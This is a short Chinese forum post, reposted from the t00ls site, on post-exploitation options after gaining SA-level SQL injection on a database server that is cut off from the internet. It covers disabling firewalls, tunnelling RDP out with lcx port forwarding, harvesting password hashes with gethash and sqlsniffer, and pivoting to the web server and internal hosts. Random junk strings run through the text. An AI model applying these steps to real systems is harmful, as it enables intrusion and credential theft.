当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
$ N- L7 G0 j$ Y/ I c$ n( i3 h; A% Z9 @1 b5 x b
: J1 L$ H* V/ Q1 U* ^- e# z0 U6 f* @
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
! C# s1 j" \. [; \( u+ B) M& ^/ S' o: v- j) P& H2 \; ]$ w' W
: n5 k+ j# J( D2 L8 R一、DB机有公网IP.& V* N6 f' b4 t% L
1 t- a* k4 n: t3 M- k( |
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.5 J; [" e, P4 ~
; Z2 e( a0 _6 E! d* T ^
# p* d: a/ `# I! J/ g2 [4 F2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
1 r# H% ]. N0 \$ n( F9 l5 { W2 {! W# T- S& F# x
' g f) \' T3 ^; b& w C# ^3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com' p- E' I9 J# t2 }! Z. R) d$ ~7 ?7 G
2 I: x% o0 E0 }! L2 y
- s6 s; p0 f2 W3 V. H- x7 U; m' I4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
8 z7 X- {9 p( c+ m: F+ y, H" E
3 k- x2 \* f$ x. o: E" P; T! N' [/ Y) W% _7 N
! S) x& Q5 P- b) y* [二、DB机只有内网IP
. r4 k. O, V/ ^# }: U" O% N$ D8 C& t. f. s& m" X( c. \
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.0 ~9 S2 e% I$ p4 v& O( w
4 Y7 P+ O4 F% j3 S& p1 J( M; J# ~1 L0 H
3 A9 E k/ X% V; k( L: r2:停掉防火墙和IP策略再从内往外扫描.
" A; X5 x4 T$ A7 [5 S. i. B1 }/ C a: s* |
! |5 N8 T* w2 K/ Y- J0 G1 ?! N
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.& E7 j3 s5 `/ p; d, N' i
7 y. m, F) B2 \1 E: |& ]
9 |" g/ Y, m/ q( b; C% P9 m- j
4:学会密码规律分析往往会有惊喜.
6 o+ o4 {! p3 M% x/ g: T: v0 v U1 I! h' L A9 ^
# k0 n& t% Z9 l5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等! g' T4 B4 _+ x, s( u* W% w
0 R* u0 w7 G- F# x: o8 N/ u: ^" K
! }8 V+ ^( @- a2 `! ]
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对